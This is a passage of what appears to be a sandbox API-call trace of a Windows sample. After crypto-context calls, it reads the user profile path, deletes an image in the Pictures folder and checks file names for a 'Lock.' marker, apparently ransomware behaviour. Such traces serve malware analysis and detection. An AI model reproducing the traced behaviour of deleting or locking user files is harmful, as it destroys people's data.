[0250.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0250.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0250.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0250.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0250.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0250.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0250.811] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0250.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0250.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0250.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0250.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0250.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0250.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0250.811] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0250.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51340 [0250.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0250.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0250.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0250.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0250.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0250.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0250.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0250.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0250.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0250.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0250.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0250.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0250.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0250.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0250.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0250.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0250.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0250.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0250.814] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0250.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0250.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0250.814] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0250.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0250.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0250.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.814] FreeLibrary (hLibModule=0x756e0000) returned 1 [0250.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0250.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0250.814] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0250.814] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0250.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0250.814] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0250.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0250.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0250.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0250.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0250.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0250.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0250.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0250.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0250.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0250.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0250.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0250.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0250.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0250.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0250.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0250.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0250.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0250.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0250.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0250.815] CloseHandle (hObject=0x2d0) returned 1 [0250.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0250.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0250.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0250.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0250.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0250.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0250.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0250.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0250.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0250.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.817] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0250.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0250.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0250.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0250.817] CloseHandle (hObject=0x2a0) returned 1 [0250.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0250.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0250.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0250.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0250.824] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0250.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0250.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0250.825] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0250.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0250.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0250.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0250.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0250.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0250.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0250.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0250.825] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Ndo_wHdmDfLw8EHAJ.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Ndo_wHdmDfLw8EHAJ.bmp", lpFilePart=0x8cedf4*="Ndo_wHdmDfLw8EHAJ.bmp") returned 0x2e [0250.825] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Ndo_wHdmDfLw8EHAJ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ndo_whdmdflw8ehaj.bmp")) returned 0x20 [0250.825] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Ndo_wHdmDfLw8EHAJ.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8cfc050, ftCreationTime.dwHighDateTime=0x1d5ee65, ftLastAccessTime.dwLowDateTime=0x3c2b4290, ftLastAccessTime.dwHighDateTime=0x1d5e80b, ftLastWriteTime.dwLowDateTime=0x3c2b4290, ftLastWriteTime.dwHighDateTime=0x1d5e80b, nFileSizeHigh=0x0, nFileSizeLow=0xc4dc, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Ndo_wHdmDfLw8EHAJ.bmp", cAlternateFileName="NDO_WH~1.BMP")) returned 0xa87610 [0250.826] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Ndo_wHdmDfLw8EHAJ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ndo_whdmdflw8ehaj.bmp")) returned 1 [0250.864] FindNextFileW (in: hFindFile=0xa87610, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8cfc050, ftCreationTime.dwHighDateTime=0x1d5ee65, ftLastAccessTime.dwLowDateTime=0x3c2b4290, ftLastAccessTime.dwHighDateTime=0x1d5e80b, ftLastWriteTime.dwLowDateTime=0x3c2b4290, ftLastWriteTime.dwHighDateTime=0x1d5e80b, nFileSizeHigh=0x0, nFileSizeLow=0xc4dc, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Ndo_wHdmDfLw8EHAJ.bmp", cAlternateFileName="NDO_WH~1.BMP")) returned 0 [0250.864] FindClose (in: hFindFile=0xa87610 | out: hFindFile=0xa87610) returned 1 [0250.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0250.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0250.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0250.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0250.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0250.908] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0250.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0250.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0250.908] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0250.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0250.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0250.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0250.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0250.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0250.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0250.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0250.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0250.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0250.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0250.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0250.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0250.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0250.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0250.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0250.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0250.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0250.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0250.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0250.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0250.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0250.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5e) returned 0x2e58910 [0250.909] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Ndo_wHdmDfLw8EHAJ.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Ndo_wHdmDfLw8EHAJ.bmp", lpFilePart=0x8cf650*="Ndo_wHdmDfLw8EHAJ.bmp") returned 0x2e [0250.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0250.909] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Ndo_wHdmDfLw8EHAJ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ndo_whdmdflw8ehaj.bmp")) returned 0xffffffff [0250.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0250.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0250.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0250.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0250.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0250.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0250.909] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0250.909] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.909] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0250.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0250.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0250.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0250.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0250.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0250.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0250.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0250.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0250.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0250.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0250.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0250.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NU6pYHrnfbris-w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U6pYHrnfbris-w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6pYHrnfbris-w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pYHrnfbris-w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHrnfbris-w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hrnfbris-w219Y.png", cchCount1=5, 